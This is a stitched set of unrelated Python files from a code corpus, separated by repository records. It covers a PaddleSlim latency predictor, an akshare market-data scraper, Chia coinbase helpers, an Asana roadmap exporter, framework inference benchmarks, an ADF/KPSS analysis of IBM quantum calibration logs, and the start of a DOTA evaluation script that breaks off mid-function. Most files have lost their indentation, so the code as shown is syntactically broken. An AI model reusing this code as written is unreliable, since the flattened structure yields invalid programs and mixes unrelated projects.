self.table_file = f'{self.hardware}_threads_4_power_mode_0.pkl'
if self.hardware in ['SD625', 'SD710']:
self.predictor_state = True
if not os.path.exists(self.table_file):
subprocess.call(
f'wget https://paddlemodels.bj.bcebos.com/PaddleSlim/analysis/{self.table_file}',
shell=True)
assert os.path.exists(
self.table_file
), f'{self.table_file} does not exist. If you want to use our table files, please set \'table_file\' in [SD625, SD710, SD845, SD865]'
with open(self.table_file, 'rb') as f:
self.table_dict = pickle.load(f)
        print('Successfully loaded {}'.format(self.table_file))
def _change_table(self, threads=4):
assert threads == 4, 'Only 4 threads are available now.'
self.table_file = f'{self.hardware}_threads_{threads}_power_mode_0.pkl'
if not os.path.exists(self.table_file):
subprocess.call(
f'wget https://paddlemodels.bj.bcebos.com/PaddleSlim/analysis/{self.table_file}',
shell=True)
with open(self.table_file, 'rb') as f:
self.table_dict = pickle.load(f)
print('Successfully loaded {}'.format(self.table_file))
def _get_input_shape(self, graph):
in_shape = []
for op in graph.ops():
param_key = get_key_from_op(op)
if param_key != '':
in_shape = op.all_inputs()[-1].shape()
break
return in_shape
def _preload_predictor(self, data_type='fp32'):
op_types = [
'depthwise_conv2d', 'conv2d', 'pool2d', 'matmul', 'elementwise_add',
'elementwise_mul', 'concat', 'calib', 'swish'
]
op_dir = self.table_file.split('.')[0] + '_batchsize_1'
for op_type in op_types:
model = load_predictor(op_type, op_dir, data_type)
key = op_type
if 'conv2d' in op_type:
key = f'{op_type}_{data_type}'
self.predictor[key] = model
def predict(self,
model_file,
param_file,
data_type,
threads=4,
input_shape=None):
"""predict the latency of the model
Args:
model_file(str), param_file(str): The inference model(*.pdmodel, *.pdiparams).
data_type(str): Data type, fp32, fp16 or int8.
threads(int): threads num
input_shape(list): Generally, the input shape is confirmed when saving the inference model and the parameter is only effective for input shape that has variable length.
Returns:
latency(float): The latency of the model.
"""
assert data_type in ['fp32', 'int8', 'fp16'
], f'data_type must be one of [fp32, int8, fp16]'
if self.hardware and self.threads != threads:
self._change_table(threads)
if self.predictor_state and f'conv2d_{data_type}' not in self.predictor:
self._preload_predictor(data_type)
enable_fp16 = True if data_type == 'fp16' else False
pbmodel_file = opt_model(
model_file=model_file,
param_file=param_file,
optimize_out_type='protobuf',
enable_fp16=enable_fp16)
paddle.enable_static()
with open(pbmodel_file, "rb") as f:
fluid_program = paddle.fluid.framework.Program.parse_from_string(
f.read())
graph = paddleslim.core.GraphWrapper(fluid_program)
if input_shape != None:
ori_shape = self._get_input_shape(graph)
            assert ori_shape == input_shape, "The parameter 'input_shape' doesn't work for now. The input shape is fixed when saving the inference model"
latency = 0.0
new_op = {}
for op in graph.ops():
param_key = get_key_from_op(op)
if param_key == '':
continue
if param_key == None:
if op.type() in new_op:
new_op[op.type()] += 1
else:
new_op.update({op.type(): 1})
continue
if param_key in self.table_dict:
latency += self.table_dict[param_key]
elif self.predictor_state:
latency += self.op_predictor(op.type(), param_key, data_type)
if len(new_op) != 0:
warnings.warn(
"These ops are not currently supported. Please raise an issue in PaddleSlim if you find the CalledTimes is large enough to affect the accuracy."
)
warnings.warn("OperatorType\tCalledTimes")
for key in new_op:
warnings.warn(f"{key.ljust(15)}\t{new_op[key]}")
shutil.rmtree(os.path.dirname(pbmodel_file))
return latency
def op_predictor(self, op_type, param_key, data_type):
"""predict the latency of the operator which is not in the table
Args:
op_type: The operator's type
param_key: The operator's parameter information.
            data_type: Data type, fp32, fp16 or int8.
Returns:
latency(float): The latency of the operator.
"""
latency = 0.0
if op_type in [
'depthwise_conv2d', 'conv2d', 'pool2d', 'matmul',
'elementwise_add', 'elementwise_mul', 'concat', 'calib', 'swish'
]:
key = op_type
if 'conv2d' in op_type:
key = f'{op_type}_{data_type}'
predictor = self.predictor[key]
features = get_features_from_paramkey(param_key, op_type, data_type)
latency = predictor.predict([features])
else:
data = get_data_from_tables(
table_dict=self.table_dict,
op_type=op_type,
data_type=data_type)
features = get_features_from_paramkey(param_key, op_type, data_type)
latency = nearest_interpolate(features, data)
assert latency != None, f'{param_key} is not in the table.'
return latency
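# A minimal usage sketch built only from the constructor and predict() signatures above;
# the model file names are hypothetical placeholders:
#
#   predictor = TableLatencyPredictor(table_file='SD710')
#   latency = predictor.predict(model_file='mobilenet_v1.pdmodel',
#                               param_file='mobilenet_v1.pdiparams',
#                               data_type='fp32',
#                               threads=4)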
```
#### File: PaddleSlim/tests/test_unstructured_pruner_quant.py
```python
import sys
sys.path.append("../")
import unittest
from static_case import StaticCase
import paddle.fluid as fluid
import paddle
from paddleslim.prune import UnstructuredPruner
from layers import conv_bn_layer
import numpy as np
class TestStaticMasks(StaticCase):
def _update_masks(self, pruner, t):
for param in pruner.masks:
mask_name = pruner.masks[param]
t_param = pruner.scope.find_var(param).get_tensor()
t_mask = pruner.scope.find_var(mask_name).get_tensor()
v_param = np.array(t_param)
v_mask = (np.abs(v_param) < t).astype(v_param.dtype)
t_mask.set(v_mask, pruner.place)
def test_set_static_masks(self):
main_program = paddle.static.default_main_program()
startup_program = paddle.static.default_startup_program()
with paddle.static.program_guard(main_program, startup_program):
input = paddle.static.data(name='image', shape=[None, 3, 16, 16])
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
conv1 = conv_bn_layer(input, 8, 1, "conv1")
conv2 = conv_bn_layer(conv1, 8, 1, "conv2")
conv3 = fluid.layers.conv2d_transpose(
input=conv2, num_filters=16, filter_size=2, stride=2)
predict = fluid.layers.fc(input=conv3, size=10, act='softmax')
cost = fluid.layers.cross_entropy(input=predict, label=label)
adam_optimizer = fluid.optimizer.AdamOptimizer(0.01)
avg_cost = fluid.layers.mean(cost)
adam_optimizer.minimize(avg_cost)
place = paddle.static.cpu_places()[0]
exe = paddle.static.Executor(place)
scope = paddle.static.global_scope()
exe.run(startup_program, scope=scope)
pruner = UnstructuredPruner(
main_program, 'ratio', scope=scope, place=place)
self._update_masks(pruner, 0.0)
pruner.update_params()
self._update_masks(pruner, 1.0)
pruner.set_static_masks()
sparsity_0 = pruner.total_sparse(main_program)
x = np.random.random(size=(10, 3, 16, 16)).astype('float32')
label = np.random.random(size=(10, 1)).astype('int64')
loss_data, = exe.run(main_program,
feed={"image": x,
"label": label},
fetch_list=[cost.name])
sparsity_1 = UnstructuredPruner.total_sparse(main_program)
pruner.update_params()
sparsity_2 = UnstructuredPruner.total_sparse(main_program)
print(sparsity_0, sparsity_1, sparsity_2)
self.assertEqual(sparsity_0, 1.0)
self.assertLess(abs(sparsity_2 - 1), 0.001)
self.assertLess(sparsity_1, 1.0)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "13767849/akshare",
"score": 2
} |
#### File: akshare/economic/macro_other.py
```python
import json
import time
import pandas as pd
import requests
from akshare.economic.cons import bitcoin_url, bitcoin_payload
def get_js_dc_current():
"""
    Real-time quotes for major cryptocurrencies; a single request returns the market data at one specific moment
:return: pandas.DataFrame
"""
bit_payload = bitcoin_payload.copy()
bit_payload.update({"_": int(time.time() * 1000)})
bit_payload.update(
{
"jsonpCallback": bitcoin_payload["jsonpCallback"].format(
int(time.time() * 1000)
)
}
)
res = requests.get(bitcoin_url, params=bit_payload)
json_data = json.loads(res.text[res.text.find("{"): res.text.rfind("}") + 1])
data_df = pd.DataFrame(json_data["data"])
data_df.set_index("update", drop=True, inplace=True)
data_df.index = pd.to_datetime(data_df.index)
return data_df.iloc[:, :-4]
def macro_fx_sentiment(start_date="2020-02-07", end_date="2020-02-07"):
"""
    Jin10 Data - FX - Speculative Sentiment Report
    The FX speculative sentiment report shows the current ratio of long to short positions in the market; the data is provided by 8 trading platforms and covers 11 major currency pairs plus one gold instrument.
    Report contents: instruments: AUD/JPY, AUD/USD, EUR/USD, EUR/AUD, EUR/JPY, GBP/USD, GBP/JPY, NZD/USD, USD/CAD, USD/CHF, USD/JPY and spot gold against the US dollar.
    Data: compiled by Shark-fx from the long/short speculative positions of 8 trading platforms worldwide (including Oanda, FXCM, Insta, Dukas, MyFxBook and FiboGroup).
    Definition: the speculative sentiment report shows the current long/short position ratio, provided by 8 trading platforms and covering 11 major currency pairs plus one gold instrument.
    Usage strategy: Shark-fx states that, because the majority is usually wrong, traders should open long positions when short positions exceed 60% and, likewise, open short positions when long positions exceed 60%; when the long/short ratio is close to 50%, the recommendation is to stay out of the market and wait.
    https://datacenter.jin10.com/reportType/dc_ssi_trends
    :param start_date: trading date
    :type start_date: str
    :param end_date: trading date, same as start_date
    :type end_date: str
    :return: speculative sentiment report
    :rtype: pandas.DataFrame
"""
url = "https://datacenter-api.jin10.com/sentiment/datas"
params = {
"start_date": start_date,
"end_date": end_date,
"currency_pair": "",
"_": int(time.time() * 1000),
}
headers = {
"accept": "*/*",
"accept-encoding": "gzip, deflate, br",
"accept-language": "zh-CN,zh;q=0.9,en;q=0.8",
"cache-control": "no-cache",
"origin": "https://datacenter.jin10.com",
"pragma": "no-cache",
"referer": "https://datacenter.jin10.com/reportType/dc_ssi_trends",
"sec-fetch-mode": "cors",
"sec-fetch-site": "same-site",
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36",
"x-app-id": "rU6QIu7JHe2gOUeR",
"x-csrf-token": "",
"x-version": "1.0.0",
}
res = requests.get(url, params=params, headers=headers)
return pd.DataFrame(res.json()["data"]["values"])
if __name__ == "__main__":
get_js_dc_current_df = get_js_dc_current()
print(get_js_dc_current_df)
macro_fx_sentiment_df = macro_fx_sentiment(start_date="2020-02-07", end_date="2020-02-07")
print(macro_fx_sentiment_df)
``` |
{
"source": "13767849/chia-blockchain",
"score": 2
} |
#### File: src/consensus/coinbase.py
```python
from blspy import AugSchemeMPL, G1Element, G2Element, PrivateKey
from src.types.blockchain_format.coin import Coin
from src.types.blockchain_format.sized_bytes import bytes32
from src.util.ints import uint32, uint64
from src.wallet.puzzles.p2_delegated_puzzle_or_hidden_puzzle import puzzle_for_pk
def create_puzzlehash_for_pk(pub_key: G1Element) -> bytes32:
return puzzle_for_pk(bytes(pub_key)).get_tree_hash()
def signature_for_coinbase(coin: Coin, pool_private_key: PrivateKey):
# noinspection PyTypeChecker
return G2Element.from_bytes(bytes(AugSchemeMPL.sign(pool_private_key, bytes(coin))))
def sign_coinbase_coin(coin: Coin, private_key: PrivateKey):
if private_key is None:
raise ValueError("unknown private key")
return signature_for_coinbase(coin, private_key)
def pool_parent_id(block_height: uint32, genesis_challenge: bytes32) -> bytes32:
return bytes32(genesis_challenge[:16] + block_height.to_bytes(16, "big"))
def farmer_parent_id(block_height: uint32, genesis_challenge: bytes32) -> bytes32:
return bytes32(genesis_challenge[16:] + block_height.to_bytes(16, "big"))
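# Both parent ids above are deterministic 32-byte values: 16 bytes taken from the genesis
# challenge (the first half for the pool coin, the second half for the farmer coin) followed
# by the block height as a 16-byte big-endian integer, so reward coin parents can be
# recomputed for any height without storing extra state.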
def create_pool_coin(block_height: uint32, puzzle_hash: bytes32, reward: uint64, genesis_challenge: bytes32):
parent_id = pool_parent_id(block_height, genesis_challenge)
return Coin(parent_id, puzzle_hash, reward)
def create_farmer_coin(block_height: uint32, puzzle_hash: bytes32, reward: uint64, genesis_challenge: bytes32):
parent_id = farmer_parent_id(block_height, genesis_challenge)
return Coin(parent_id, puzzle_hash, reward)
``` |
{
"source": "137717unity/ccos-scripts",
"score": 3
} |
#### File: ccos-scripts/search_roadmap_export/search_roadmap_export.py
```python
import os
import json
# Third-party
import asana
from github import Github
from config import CONFIG
ASANA_CLIENT = asana.Client.access_token(os.environ["ADMIN_ASANA_TOKEN"])
GITHUB_CLIENT = Github(os.environ["ADMIN_GITHUB_TOKEN"])
"""
databag schema
{
"quarters": [
{
"name": "Q1 2020",
"tasks": [
{
"gid": "",
"name": "",
"description": ""
},
...
]
},
{
"name": "Q2 2020",
"tasks": []
},
...
]
}
"""
def generate_databag():
databag = {
"quarters": []
}
print('Generating Databag...')
for section_name, section_gid in CONFIG['ROADMAP_SECTIONS'].items(): # for section in included sections
print(' Pulling tasks for quarter - {}...'.format(section_name))
tasks = ASANA_CLIENT.tasks.find_by_section( # Get tasks in section
CONFIG['ROADMAP_SECTIONS'][section_name],
opt_fields=['name', 'custom_fields', 'tags.name', 'completed']
)
print(' Done.')
quarter = {
"name": section_name,
"tasks": []
}
print(' Processing tasks...')
for task in tasks:
# if task does not have opt out flag, and is not complete
if has_filtering_tag(task) and not task['completed']:
quarter['tasks'].append({
'gid': task['gid'],
'name': task['name'],
'description': get_public_description(task)
})
print(' Done.')
databag['quarters'].append(quarter)
print(' Pruning quarters...') # remove quarter if it has no tasks
databag['quarters'] = [quarter for quarter in databag['quarters'] if len(quarter['tasks']) != 0]
print(' Done.')
return databag
"""
Returns True when the Asana task should be included, i.e. it does not carry the 'roadmap_ignore' opt-out tag
"""
def has_filtering_tag(task):
for tag in task['tags']:
if tag['name'] == 'roadmap_ignore':
return False
return True
"""
Gets the Public Description field of an Asana Task
"""
def get_public_description(task):
for field in task['custom_fields']:
if field['name'] == 'Public Description':
return field['text_value']
def push_to_repo(databag):
oss_repo = GITHUB_CLIENT.get_repo("creativecommons/creativecommons.github.io-source")
update = oss_repo.update_file(
path="databags/search_roadmap.json",
message="Update Search Roadmap Databag",
content=json.dumps(databag),
sha=oss_repo.get_contents("databags/search_roadmap.json").sha,
branch="master"
)
return update
print("Pulling from Asana...")
databag = generate_databag()
print("Pull successful.")
print("Pushing page content to open source repo...")
push_data = push_to_repo(databag)
print("Pushed successfully. Commit Info: {}".format(push_data))
``` |
{
"source": "137996047/DeepLearningFrameworks",
"score": 2
} |
#### File: 137996047/DeepLearningFrameworks/pytorch_infer.py
```python
import time
import torch
import pandas as pd
import torchvision.models as models
from utils import give_fake_data, ITER_NUMS
from tqdm import tqdm
class ModelSpeed(object):
def __init__(self, model):
self.cuda_is_available = torch.cuda.is_available()
self.device = torch.device('cpu')
self.model = model.to(self.device)
def test_time(self, data):
# generate inputs data
inputs = torch.tensor(data).to(self.device)
# use mkldnn accelerator
#inputs = inputs.to_mkldnn()
self.model.eval()
with torch.no_grad():
sum_time = 0
sum_num = 0
for idx in range(ITER_NUMS):
#keep t_start, model_inference, t_end procedure synchronize
if self.cuda_is_available:
torch.cuda.synchronize()
t_start = time.time()
self.model(inputs)
if self.cuda_is_available:
torch.cuda.synchronize()
t_end = time.time()
if idx >= 5:
sum_time += t_end - t_start
sum_num += 1
# experiment logs
bs_time = sum_time / sum_num
fps = (1 / bs_time) * data.shape[0]
model_speed_logs.loc[model_speed_logs.shape[0], :] = [model_name, bs, bs_time, fps]
if __name__ == '__main__':
model_names = ['resnet18', 'resnet50']
batch_size = [1, 2, 4, 8]
model_speed_logs = pd.DataFrame(columns = ['model_name', 'bs', 'bs_time', 'fps'])
# set dtype include input_data and model_parameters
torch.set_default_dtype(torch.float)
#different models
for model_name in model_names:
print('-'*15, model_name, '-'*15)
model = getattr(models, model_name)(pretrained=True)
model_speed = ModelSpeed(model)
# different batch size
for bs in tqdm(batch_size):
data_cl,data_cf = give_fake_data(bs)
model_speed.test_time(data_cf)
model_speed_logs.to_csv('./result/pytorch_model_speed_experiments.csv', index = False)
```
#### File: 137996047/DeepLearningFrameworks/tf_infer.py
```python
import time
import tensorflow as tf
import os.path as osp
import pandas as pd
from tqdm import tqdm
from utils import give_fake_data, ITER_NUMS
from tensorflow.contrib.slim.nets import resnet_v2 as models
class ModelSpeed(object):
def __init__(self, model_name):
self.input_tensor = tf.placeholder(tf.float32, shape=(None,224,224,3), name='input_image')
self.sess = tf.Session()
arg_scope = models.resnet_arg_scope()
with tf.contrib.slim.arg_scope(arg_scope):
self.net, end_points = getattr(models, model_name)(self.input_tensor, 1001, is_training=False)
saver = tf.train.Saver()
saver.restore(self.sess, osp.join('./models/tf/', model_name + '.ckpt'))
def test_time(self, data):
sum_time = 0
sum_num = 0
for idx in range(ITER_NUMS):
t_start = time.time()
self.sess.run(self.net, feed_dict={self.input_tensor: data})
t_end = time.time()
if idx >= 5:
sum_time += t_end - t_start
sum_num += 1
# experiment logs
bs_time = sum_time / sum_num
fps = (1 / bs_time) * data.shape[0]
model_speed_logs.loc[model_speed_logs.shape[0], :] = [model_name, bs, bs_time, fps]
if __name__ == '__main__':
model_names = ['resnet_v2_50']
batch_size = [1, 2, 4, 8]
model_speed_logs = pd.DataFrame(columns = ['model_name', 'bs', 'bs_time', 'fps'])
#different models
for model_name in model_names:
print('-'*15, model_name, '-'*15)
model_speed = ModelSpeed(model_name)
time.sleep(1)
# different batch size
for bs in tqdm(batch_size):
fake_input_data_cl, fake_input_data_cf = give_fake_data(bs)
model_speed.test_time(fake_input_data_cl)
model_speed.sess.close()
model_speed_logs.to_csv('./result/tf_model_speed_experiments.csv', index = False)
``` |
{
"source": "137sc21/137_sc21",
"score": 2
} |
#### File: 137_sc21/src/KPSS_Individual_Analysis.py
```python
import os
import re
import warnings
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from statsmodels.tsa.stattools import adfuller
from statsmodels.tsa.stattools import kpss
warnings.simplefilter("ignore")
from datetime import datetime
T1_KPSS_dataframe = pd.DataFrame()
T2_KPSS_dataframe = pd.DataFrame()
Frequency_KPSS_dataframe = pd.DataFrame()
SQU3_KPSS_dataframe = pd.DataFrame()
Readout_KPSS_dataframe = pd.DataFrame()
CNOT_KPSS_dataframe = pd.DataFrame()
T1_ADF_dataframe = pd.DataFrame()
T2_ADF_dataframe = pd.DataFrame()
Frequency_ADF_dataframe = pd.DataFrame()
SQU3_ADF_dataframe = pd.DataFrame()
Readout_ADF_dataframe = pd.DataFrame()
CNOT_ADF_dataframe = pd.DataFrame()
appended_T1_adf =[]
appended_T1_kpss =[]
appended_T2_adf =[]
appended_T2_kpss =[]
appended_Frequency_adf =[]
appended_Frequency_kpss =[]
appended_SQU3_adf =[]
appended_SQU3_kpss =[]
appended_Readout_adf =[]
appended_Readout_kpss =[]
appended_CNOT_adf =[]
appended_CNOT_kpss =[]
def adf_test(timeseries):
# print('Results of Dickey-Fuller Test:')
dftest = adfuller(timeseries, autolag='AIC')
dfoutput = pd.Series(dftest[0:4], index=['Test Statistic', 'p-value', '#Lags Used',
'Number of Observations Used'])
for key, value in dftest[4].items():
dfoutput['Critical Value (%s)' % key] = value
return(dfoutput)
def kpss_test(timeseries):
# print('Results of KPSS Test:')
kpsstest = kpss(timeseries, regression='c')
kpss_output = pd.Series(kpsstest[0:3], index=['Test Statistic', 'p-value', 'Lags Used'])
for key, value in kpsstest[3].items():
kpss_output['Critical Value (%s)' % key] = value
# kpss_output = kpss_output.cumsum()
# dataframe=(kpss_output.to_frame().T)
# print(dataframe)
# dataframe.plot(kind='bar',y='p-value',x='timestamp',legend=False,figsize=(8,8),xlabel='ADF Statistical Test',ylabel='Value')
return(kpss_output)
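# Interpretation note: the ADF test's null hypothesis is that the series has a unit root
# (non-stationary), whereas the KPSS null is that the series is stationary, so a low ADF
# p-value and a high KPSS p-value both point toward stationarity.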
machine_list = ["ibmq_16_melbourne.csv", "ibmq_ourense.csv", "ibmq_vigo.csv", "ibmq_5_yorktown - ibmqx2.csv"]
for machines in machine_list:
date_analysis = datetime.now().strftime("%Y_%m_%d-%I_%M_%S_%p")
machine_name=""
path = ".\\Log\\"
dirs = os.listdir(path)
pd.set_option('display.max_columns', None)
frame = pd.DataFrame()
df2 = pd.DataFrame()
Original_T1 =[]
Original_T2 =[]
Original_Frequency= []
Original_Readout =[]
Original_SQU3 = []
Original_CNOT_Keys=[]
Original_CNOT_Values=[]
Final_T1= []
Final_T2= []
Final_Frequncy= []
Final_Readout= []
Final_SQU3= []
Final_CNOT = []
for subdir in dirs:
subpath = os.listdir(path+subdir)
# print(subdir)
for files in subpath:
if files == machines:
name = machines.split(".")
machine_name = name[0]
# print(machine_name)
# if files == "ibmq_ourense.csv":
# if files == "ibmq_vigo.csv":
# if files == "ibmq_5_yorktown - ibmqx2.csv":
def isfloat(value):
try:
float(value)
return True
except ValueError:
return False
df = pd.read_csv(path+subdir+"\\"+files,index_col=None,header=0)
T1 = df.iloc[:,1]
T2 = df.iloc[:,2]
Freqency = df.iloc[:,3]
Readout = df.iloc[:,4]
SQU3 = df.iloc[:,5]
CNOT = df.iloc[:,6]
df.insert(0, 'timestamp', str(subdir))
df.timestamp = pd.to_datetime(str(subdir), format='%Y-%m-%d')
# print(df)
df.index = df.timestamp
df = df.rename(columns={"Frecuency (GHz)": "Frequency (GHz)"})
# print(df)
# df.drop('Month', axis=1, inplace=True)
# df.iloc[:,1].plot()
for cnot_parts in CNOT:
cnot_key_value = re.split(',',str(cnot_parts))
for i in cnot_key_value:
# print("===================================================================")
# individual = str(i)
indivitual = re.split(':',i)
for keys in indivitual:
if keys.lower().startswith('nan'):
indivitual.remove(keys)
keys = keys.strip()
if keys.lower().startswith('cx'):
Original_CNOT_Keys.append(keys)
if isfloat(keys):
if np.isnan(float(keys)):
pass
else:
Original_CNOT_Values.append(keys)
T1_data = np.array(T1)
T2_data = np.array(T2)
Freqency_data= np.array(Freqency)
Readout_data = np.array(Readout)
SQU3_data = np.array(SQU3)
Original_T1.append(T1_data)
Original_T2.append(T2_data)
Original_Frequency.append(Freqency_data)
Original_Readout.append(Readout_data)
Original_SQU3.append(SQU3_data)
adf_res = adf_test(df['T1 (µs)'])
result = kpss_test(df['T1 (µs)'])
stodataframe = pd.DataFrame()
stodataframe = result.to_frame().T.__deepcopy__()
stodataframe.insert(0, 'timestamp', str(subdir))
stodataframe.timestamp = pd.to_datetime(str(subdir), format='%Y-%m-%d')
stodataframe.index = stodataframe.timestamp
stodataframe2 = pd.DataFrame()
stodataframe2 = adf_res.to_frame().T.__deepcopy__()
stodataframe2.insert(0, 'timestamp', str(subdir))
stodataframe2.timestamp = pd.to_datetime(str(subdir), format='%Y-%m-%d')
stodataframe2.index = stodataframe2.timestamp
appended_T1_kpss.append(stodataframe)
appended_T1_adf.append((stodataframe2))
adf_res = adf_test(df['T2 (µs)'])
result = kpss_test(df['T2 (µs)'])
stodataframe = pd.DataFrame()
stodataframe = result.to_frame().T.__deepcopy__()
stodataframe.insert(0, 'timestamp', str(subdir))
stodataframe.timestamp = pd.to_datetime(str(subdir), format='%Y-%m-%d')
stodataframe.index = stodataframe.timestamp
stodataframe2 = pd.DataFrame()
stodataframe2 = adf_res.to_frame().T.__deepcopy__()
stodataframe2.insert(0, 'timestamp', str(subdir))
stodataframe2.timestamp = pd.to_datetime(str(subdir), format='%Y-%m-%d')
stodataframe2.index = stodataframe2.timestamp
appended_T2_kpss.append(stodataframe)
appended_T2_adf.append((stodataframe2))
adf_res = adf_test(df['Frequency (GHz)'])
result = kpss_test(df['Frequency (GHz)'])
stodataframe = pd.DataFrame()
stodataframe = result.to_frame().T.__deepcopy__()
stodataframe.insert(0, 'timestamp', str(subdir))
stodataframe.timestamp = pd.to_datetime(str(subdir), format='%Y-%m-%d')
stodataframe.index = stodataframe.timestamp
stodataframe2 = pd.DataFrame()
stodataframe2 = adf_res.to_frame().T.__deepcopy__()
stodataframe2.insert(0, 'timestamp', str(subdir))
stodataframe2.timestamp = pd.to_datetime(str(subdir), format='%Y-%m-%d')
stodataframe2.index = stodataframe2.timestamp
appended_Frequency_kpss.append(stodataframe)
appended_Frequency_adf.append((stodataframe2))
adf_res = adf_test(df['Readout error'])
result = kpss_test(df['Readout error'])
stodataframe = pd.DataFrame()
stodataframe = result.to_frame().T.__deepcopy__()
stodataframe.insert(0, 'timestamp', str(subdir))
stodataframe.timestamp = pd.to_datetime(str(subdir), format='%Y-%m-%d')
stodataframe.index = stodataframe.timestamp
stodataframe2 = pd.DataFrame()
stodataframe2 = adf_res.to_frame().T.__deepcopy__()
stodataframe2.insert(0, 'timestamp', str(subdir))
stodataframe2.timestamp = pd.to_datetime(str(subdir), format='%Y-%m-%d')
stodataframe2.index = stodataframe2.timestamp
appended_Readout_kpss.append(stodataframe)
appended_Readout_adf.append((stodataframe2))
adf_res = adf_test(df['Single-qubit U3 error rate'])
result = kpss_test(df['Single-qubit U3 error rate'])
stodataframe = pd.DataFrame()
stodataframe = result.to_frame().T.__deepcopy__()
stodataframe.insert(0, 'timestamp', str(subdir))
stodataframe.timestamp = pd.to_datetime(str(subdir), format='%Y-%m-%d')
stodataframe.index = stodataframe.timestamp
stodataframe2 = pd.DataFrame()
stodataframe2 = adf_res.to_frame().T.__deepcopy__()
stodataframe2.insert(0, 'timestamp', str(subdir))
stodataframe2.timestamp = pd.to_datetime(str(subdir), format='%Y-%m-%d')
stodataframe2.index = stodataframe2.timestamp
appended_SQU3_kpss.append(stodataframe)
appended_SQU3_adf.append((stodataframe2))
adf_res = adf_test(Original_CNOT_Values)
result = kpss_test(Original_CNOT_Values)
stodataframe = pd.DataFrame()
stodataframe = result.to_frame().T.__deepcopy__()
stodataframe.insert(0, 'timestamp', str(subdir))
stodataframe.timestamp = pd.to_datetime(str(subdir), format='%Y-%m-%d')
stodataframe.index = stodataframe.timestamp
stodataframe2 = pd.DataFrame()
stodataframe2 = adf_res.to_frame().T.__deepcopy__()
stodataframe2.insert(0, 'timestamp', str(subdir))
stodataframe2.timestamp = pd.to_datetime(str(subdir), format='%Y-%m-%d')
stodataframe2.index = stodataframe2.timestamp
appended_CNOT_kpss.append(stodataframe)
appended_CNOT_adf.append((stodataframe2))
df['T1'] = df['T1 (µs)'] - df['T1 (µs)'].shift(1)
n = 7
df['T1'] = df['T1 (µs)'] - df['T1 (µs)'].shift(n)
df['T1_log'] = np.log(df['T1 (µs)'])
df['T1_log_diff'] = df['T1_log'] - df['T1_log'].shift(1)
# df['T1_log_diff'].dropna().plot()
df = df.replace(np.nan, 0)
# plt.polar(df['T1_log_diff'])
# adf_test(df['T1_log_diff'].dropna())
# kpss_test(df['T1_log_diff'].dropna())
# from pandas.plotting import scatter_matrix
# scatter_matrix(df2, alpha=0.2, figsize=(8, 8), diagonal="kde")
df['T1_log_diff']=df['T1_log_diff']
# print(df2)
#['Test Statistic', 'p-value', 'Lags Used']
# df2.plot(kind='line',y='p-value',x='timestamp',legend=True,figsize=(8,8),xlabel='ADF Statistical Test',ylabel='Value')
# print(df['T1_log_diff'])
# plt.hist(df2['p-value'])
# df2.dropna().plot()
# plt.show()
# plt.cla()
T1_KPSS_dataframe = pd.concat(appended_T1_kpss)
T1_ADF_dataframe = pd.concat(appended_T1_adf)
T2_KPSS_dataframe = pd.concat(appended_T2_kpss)
T2_ADF_dataframe = pd.concat(appended_T2_adf)
Frequency_KPSS_dataframe = pd.concat(appended_Frequency_kpss)
Frequency_ADF_dataframe = pd.concat(appended_Frequency_adf)
SQU3_KPSS_dataframe = pd.concat(appended_SQU3_kpss)
SQU3_ADF_dataframe = pd.concat(appended_SQU3_adf)
Readout_KPSS_dataframe = pd.concat(appended_Readout_kpss)
Readout_ADF_dataframe = pd.concat(appended_Readout_adf)
CNOT_KPSS_dataframe = pd.concat(appended_CNOT_kpss)
CNOT_ADF_dataframe = pd.concat(appended_CNOT_adf)
# dataframe = pd.concat(appended_data)
# dataframe2 = pd.concat(appended_data_adf)
# print(dataframe)
directory = date_analysis
parent_dir = "./Result/"+machine_name+"/"
path = os.path.join(parent_dir, directory)
os.mkdir(path)
# plt.show()
fig, axes = plt.subplots(nrows=3, ncols=2)
T1_KPSS_dataframe.plot(color='red', xticks=[], ax=axes[0, 0], kind='line', y='p-value', x='timestamp',
subplots=True, legend=False, figsize=(15, 10), xlabel='T1')
T2_KPSS_dataframe.plot(color='red', xticks=[], ax=axes[0, 1], kind='line', y='p-value', x='timestamp',
subplots=True, legend=False, figsize=(15, 10), xlabel='T2')
Readout_KPSS_dataframe.plot(color='red', xticks=[], ax=axes[1, 0], kind='line', y='p-value', x='timestamp',
subplots=True, legend=False, figsize=(15, 10), xlabel='Readout', ylabel='P-Value')
Frequency_KPSS_dataframe.plot(color='red', xticks=[], ax=axes[1, 1], kind='line', y='p-value', x='timestamp',
subplots=True, legend=False, figsize=(15, 10), xlabel='Frequency' )
SQU3_KPSS_dataframe.plot(color='red', xticks=[], ax=axes[2, 0], kind='line', y='p-value', x='timestamp',
subplots=True, legend=False, figsize=(15, 10), xlabel='SQU3')
CNOT_KPSS_dataframe.plot(color='red', xticks=[], ax=axes[2, 1], kind='line', y='p-value', x='timestamp',
subplots=True, legend=False, figsize=(15, 10), xlabel='CNOT')
# plt.savefig("./Result/" + machine_name + "/" + date_analysis + "/ALL_KPSS.png")
fig.tight_layout()
plt.savefig("./Result/" + machine_name + "/" + date_analysis + "/2019_ADF_KPSS.png")
img_path = "./Result/"+machine_name+"/"+date_analysis+"/"
img_dirs = os.listdir(img_path)
from PIL import Image
imageList = []
for files in img_dirs:
image = Image.open(str("./Result/"+machine_name+"/"+date_analysis+"/"+files))
im1 = image.convert('RGB')
imageList.append(im1)
im1.save(r"./Result/"+machine_name+"/"+date_analysis+"/ADF_KPSS_Result.pdf",save_all=True, append_images=imageList)
```
#### File: 137_sc21/src/Wait_Parser.py
```python
import pandas as pd
import os
basePath = os.path.dirname(os.path.abspath(__file__))
from io import StringIO
def CustomParser(data):
import json
j1 = json.loads(data)
return j1
lines = []
with open('Data/Analysis_Part_One/Athens') as f:
lines = (f.read().splitlines())
TESTDATA = StringIO(lines[0])
df = pd.DataFrame(lines)
df4 = pd.read_csv(TESTDATA,sep=",")
print(df4)
``` |
{
"source": "137xiaoyu/BBAVectors-Oriented-Object-Detection",
"score": 2
} |
#### File: my_tools/DOTA_devkit/dota_evaluation_task1.py
```python
import xml.etree.ElementTree as ET
import os
#import cPickle
import numpy as np
import matplotlib.pyplot as plt
import polyiou
from functools import partial
import cv2
def reorder_pts(tt, rr, bb, ll):
pts = np.asarray([tt,rr,bb,ll],np.float32)
l_ind = np.argmin(pts[:,0])
